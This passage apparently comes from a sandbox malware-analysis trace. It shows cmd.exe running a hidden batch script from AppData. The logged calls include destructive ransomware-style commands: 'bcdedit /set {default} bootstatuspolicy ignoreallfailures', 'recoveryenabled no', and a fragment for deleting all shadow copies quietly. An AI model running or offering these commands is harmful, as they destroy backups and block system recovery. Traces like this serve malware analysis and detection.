_String2="PROMPT") returned -14 [0195.106] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0195.106] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0195.106] _wcsicmp 
(_String1="bcdedit", _String2="RD") returned -16 [0195.106] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0195.106] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0195.106] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0195.106] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0195.106] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0195.106] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0195.106] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0195.106] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0195.106] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0195.106] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0195.106] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0195.106] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0195.106] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0195.106] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0195.106] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0195.106] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0195.107] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0195.107] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0195.107] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0195.107] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0195.107] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0195.107] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0195.107] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0195.107] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0195.107] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0195.107] 
GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.107] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.107] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.107] FindClose (in: hFindFile=0x490fd8 | out: hFindFile=0x490fd8) returned 1 [0195.107] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0195.107] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0195.108] GetConsoleTitleW (in: lpConsoleTitle=0x28ef58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.108] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ede0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28eea8 | out: lpAttributeList=0x28ede0, lpSize=0x28eea8) returned 1 [0195.108] UpdateProcThreadAttribute (in: lpAttributeList=0x28ede0, dwFlags=0x0, Attribute=0x60001, lpValue=0x28eea0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ede0, lpPreviousValue=0x0) returned 1 [0195.108] GetStartupInfoW (in: lpStartupInfo=0x28ed9c | out: lpStartupInfo=0x28ed9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0195.108] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0195.108] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, 
lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ee3c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ee88 | out: lpCommandLine="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x28ee88*(hProcess=0x58, hThread=0x54, dwProcessId=0xb40, dwThreadId=0xac4)) returned 1 [0195.115] CloseHandle (hObject=0x54) returned 1 [0195.115] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0195.115] GetEnvironmentStringsW () returned 0x492c28* [0195.116] FreeEnvironmentStringsW (penv=0x492c28) returned 1 [0195.116] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0195.308] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x28ed7c | out: lpExitCode=0x28ed7c*=0x0) returned 1 [0195.308] CloseHandle (hObject=0x58) returned 1 [0195.308] _vsnwprintf (in: _Buffer=0x28eec4, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ed88 | out: _Buffer="00000000") returned 8 [0195.308] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0195.308] GetEnvironmentStringsW () returned 0x492c28* [0195.308] FreeEnvironmentStringsW (penv=0x492c28) returned 1 [0195.308] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0195.308] GetEnvironmentStringsW () returned 0x492c28* [0195.308] FreeEnvironmentStringsW (penv=0x492c28) returned 1 [0195.308] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ede0 | out: lpAttributeList=0x28ede0) [0195.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.308] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0195.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.308] 
GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0195.309] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.309] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0195.309] SetConsoleInputExeNameW () returned 0x1 [0195.309] GetConsoleOutputCP () returned 0x1b5 [0195.309] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0195.309] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.309] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0195.309] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0195.309] _get_osfhandle (_FileHandle=3) returned 0x58 [0195.309] SetFilePointer (in: hFile=0x58, lDistanceToMove=455, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c7 [0195.310] _get_osfhandle (_FileHandle=3) returned 0x58 [0195.310] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c7 [0195.310] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x75, lpOverlapped=0x0) returned 1 [0195.311] SetFilePointer (in: hFile=0x58, lDistanceToMove=477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1dd [0195.311] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=22, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 10 localhost\r\ne delete shadows /all /quiet & bcdedit.exe /set {default} 
recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 22 [0195.312] _tell (_FileHandle=3) returned 477 [0195.312] _close (_FileHandle=3) returned 0 [0195.312] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0195.312] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.312] GetFileType (hFile=0x7) returned 0x2 [0195.312] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0195.312] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0195.312] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.313] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0195.313] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0195.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0195.313] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0195.313] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0195.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.313] GetFileType (hFile=0x7) returned 0x2 [0195.313] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0195.313] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0195.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.314] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, 
lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0195.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.314] GetFileType (hFile=0x7) returned 0x2 [0195.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0195.314] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0195.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.314] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x480ff8*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x480ff8*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0195.314] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" -n 10 localhost ") returned 17 [0195.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.314] GetFileType (hFile=0x7) returned 0x2 [0195.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0195.314] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0195.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.315] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x11) returned 1 [0195.315] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0195.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.315] GetFileType (hFile=0x7) returned 0x2 [0195.315] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0195.315] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0195.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.315] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0195.316] _wcsicmp 
(_String1="ping", _String2="DIR") returned 12 [0195.316] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0195.316] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0195.316] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0195.316] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0195.316] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0195.316] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0195.316] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0195.316] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0195.316] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0195.316] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0195.316] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0195.316] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0195.316] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0195.316] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0195.316] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0195.316] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0195.316] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0195.316] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0195.316] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0195.316] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0195.316] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0195.316] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0195.316] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0195.316] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0195.316] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0195.316] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0195.316] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0195.316] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0195.316] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 
[0195.316] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0195.316] _wcsicmp (_String1="ping", _String2="START") returned -3 [0195.316] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0195.316] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0195.316] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0195.316] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0195.316] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0195.316] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0195.317] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0195.317] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0195.317] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0195.317] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0195.317] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.317] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.317] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.317] FindClose (in: hFindFile=0x491de0 | out: hFindFile=0x491de0) returned 1 [0195.317] FindClose (in: hFindFile=0x491de0 | out: hFindFile=0x491de0) returned 1 [0195.317] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0195.317] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0195.318] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.318] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.318] 
NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.318] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.318] FindClose (in: hFindFile=0x4921c8 | out: hFindFile=0x4921c8) returned 1 [0195.318] FindClose (in: hFindFile=0x4921c8 | out: hFindFile=0x4921c8) returned 1 [0195.318] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0195.318] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0195.318] GetConsoleTitleW (in: lpConsoleTitle=0x28f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.318] InitializeProcThreadAttributeList (in: lpAttributeList=0x28eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef70 | out: lpAttributeList=0x28eea8, lpSize=0x28ef70) returned 1 [0195.318] UpdateProcThreadAttribute (in: lpAttributeList=0x28eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28eea8, lpPreviousValue=0x0) returned 1 [0195.318] GetStartupInfoW (in: lpStartupInfo=0x28ee64 | out: lpStartupInfo=0x28ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0195.319] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0195.319] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 10 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 10 localhost", dwX=0x0, dwY=0x1, 
dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ef50 | out: lpCommandLine="ping -n 10 localhost", lpProcessInformation=0x28ef50*(hProcess=0x54, hThread=0x58, dwProcessId=0xadc, dwThreadId=0xb90)) returned 1 [0195.320] CloseHandle (hObject=0x58) returned 1 [0195.320] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0195.320] GetEnvironmentStringsW () returned 0x490940* [0195.320] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0195.320] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0207.887] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ee44 | out: lpExitCode=0x28ee44*=0x0) returned 1 [0207.887] CloseHandle (hObject=0x54) returned 1 [0207.887] _vsnwprintf (in: _Buffer=0x28ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ee50 | out: _Buffer="00000000") returned 8 [0207.887] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0207.887] GetEnvironmentStringsW () returned 0x490940* [0207.888] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0207.888] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.888] GetEnvironmentStringsW () returned 0x490940* [0207.888] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0207.888] DeleteProcThreadAttributeList (in: lpAttributeList=0x28eea8 | out: lpAttributeList=0x28eea8) [0207.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.888] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.888] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.888] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.888] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.888] 
SetConsoleInputExeNameW () returned 0x1 [0207.888] GetConsoleOutputCP () returned 0x1b5 [0207.888] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.888] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.888] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0207.889] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0207.889] _get_osfhandle (_FileHandle=3) returned 0x54 [0207.889] SetFilePointer (in: hFile=0x54, lDistanceToMove=477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1dd [0207.889] _get_osfhandle (_FileHandle=3) returned 0x54 [0207.889] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1dd [0207.889] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x5f, lpOverlapped=0x0) returned 1 [0207.890] SetFilePointer (in: hFile=0x54, lDistanceToMove=503, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1f7 [0207.890] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=26, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\nlete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 26 [0207.891] _tell (_FileHandle=3) returned 503 [0207.891] _close (_FileHandle=3) returned 0 [0207.891] _vsnwprintf (in: _Buffer=0x4a9f4640, 
_BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0207.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.891] GetFileType (hFile=0x7) returned 0x2 [0207.891] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.891] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0207.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.891] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0207.892] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0207.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.892] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0207.892] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0207.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.892] GetFileType (hFile=0x7) returned 0x2 [0207.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.892] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0207.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.892] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0207.893] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.893] GetFileType (hFile=0x7) returned 0x2 [0207.893] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.893] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) 
returned 1 [0207.893] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.893] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x480ff8*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x480ff8*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0207.893] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" CiOHhXJTCFVtKQz1Zuv ") returned 21 [0207.893] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.893] GetFileType (hFile=0x7) returned 0x2 [0207.893] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.893] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0207.893] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.893] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x15) returned 1 [0207.894] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0207.894] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.894] GetFileType (hFile=0x7) returned 0x2 [0207.894] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.894] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0207.894] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.894] WriteConsoleW (in: 